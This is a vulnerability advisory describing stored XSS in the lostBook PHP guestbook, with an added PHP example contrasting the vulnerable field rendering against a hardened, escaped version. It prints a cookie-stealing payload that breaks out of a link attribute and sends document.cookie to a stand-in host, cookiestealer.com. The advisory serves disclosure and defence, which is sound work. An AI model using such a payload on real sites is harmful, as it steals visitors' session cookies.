Product: lostBook
Vendor: veryLost (verylost.tk)
Affected Versions: 1.1 and lower
Description: A simple flat db guestbook
Vulnerabilities: XSS
Date: July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Javascript Execution
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)
The only reason I call this javascript execution rather than XSS is that you cannot inject arbitrary HTML the way you can in most XSS vulnerabilities. The input lands inside the quotes of an existing tag attribute, so what you get is attribute and event-handler injection, which is still enough to run script in the victim's browser.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Javascript Execution ] oOoOoOo(O_o)
On the write-entry page of the guestbook there are four fields: Name, Email, Website and Entry. The Email and Website fields go through no filtering at all, so a malicious user can use either of them to insert javascript that runs for everyone who views the guestbook.
Example: the Website value is checked only for being empty and then echoed straight into the page (the tag inside the echo did not survive in this copy of the advisory; only the surrounding check remains):

if(isset($web) && $web != "" && $web != " ") echo ' ';

Nothing in that check escapes quotes or angle brackets, so a double quote in the submitted value ends the attribute the value is written into.
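The following is an added example, not lostBook's code and not the author's. Since the tag inside the advisory's echo is missing, it assumes the Website value was written into the href attribute of an <a> tag (that is what the quote-breaking payload in this advisory targets) and that Email was written into a mailto: link. It puts the vulnerable rendering next to a hardened version that validates the scheme and HTML-escapes the value with ENT_QUOTES, and feeds both the advisory's payload.

```php
<?php
// Added example: reconstructs the guestbook's rendering of the Website and
// Email fields and shows a hardened form. ASSUMPTION: the value was echoed
// into an <a href="..."> attribute; the real tag is absent from the advisory.

// Vulnerable rendering as the advisory describes it: the value is only tested
// for being empty, never escaped, so a double quote terminates the attribute
// and anything after it becomes new attributes (e.g. onmouseover=...).
function render_website_vulnerable(?string $web): string
{
    if (isset($web) && $web != "" && $web != " ") {
        return '<a href="' . $web . '">' . $web . '</a>';
    }
    return '';
}

// Hardened rendering: allow only http(s) URLs, then HTML-escape with
// ENT_QUOTES so neither " nor ' can break out of the attribute value.
function render_website_safe(?string $web): string
{
    $web = trim((string) $web);
    if ($web === '') {
        return '';
    }
    // Guestbook users type bare hostnames like r3d5pik3.com; add a scheme.
    if (!preg_match('#^https?://#i', $web)) {
        $web = 'http://' . $web;
    }
    // Syntactic validation plus a scheme allow-list rejects javascript:,
    // data: and values containing spaces or quotes.
    $scheme = strtolower((string) parse_url($web, PHP_URL_SCHEME));
    if (filter_var($web, FILTER_VALIDATE_URL) === false
        || !in_array($scheme, ['http', 'https'], true)) {
        return '';
    }
    $escaped = htmlspecialchars($web, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="' . $escaped . '" rel="nofollow">' . $escaped . '</a>';
}

// Same treatment for the Email field: validate, then escape before use in
// both the attribute and the link text.
function render_email_safe(?string $email): string
{
    $email = trim((string) $email);
    if ($email === '' || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return '';
    }
    $escaped = htmlspecialchars($email, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="mailto:' . $escaped . '">' . $escaped . '</a>';
}

// Constructed sample input: the advisory's payload, onmouseover variant,
// as it would be submitted in the Website field.
$payload = 'r3d5pik3.com" onmouseover="document.location='
         . "'http://www.cookiestealer.com?cookie='+document.cookie";

echo "vulnerable: " . render_website_vulnerable($payload) . "\n";
echo "hardened:   [" . render_website_safe($payload) . "]\n";
echo "email:      [" . render_email_safe($payload . '@example.com') . "]\n";
```

The vulnerable function emits the payload verbatim, so the browser sees a real onmouseover attribute on the link. The hardened function drops the payload at validation; had a variant passed validation, the ENT_QUOTES escaping would still keep it inside the attribute value as inert text. Escaping belongs at output time, next to the echo, not at form-submission time, because the flat-file store will be rendered by whatever code reads it later.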
An attacker would exploit this by entering the following into either the Email or Website field:

r3d5pik3.com" onload="document.location='http://www.cookiestealer.com?cookie='+document.cookie

The leading quote closes the attribute the value is written into and the rest is added as a new event-handler attribute. If onload does not fire (it only fires on elements such as body, img and iframe, not on a link), onmouseover works instead, and the cookie of anyone who hovers over the entry is sent to the attacker's host.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)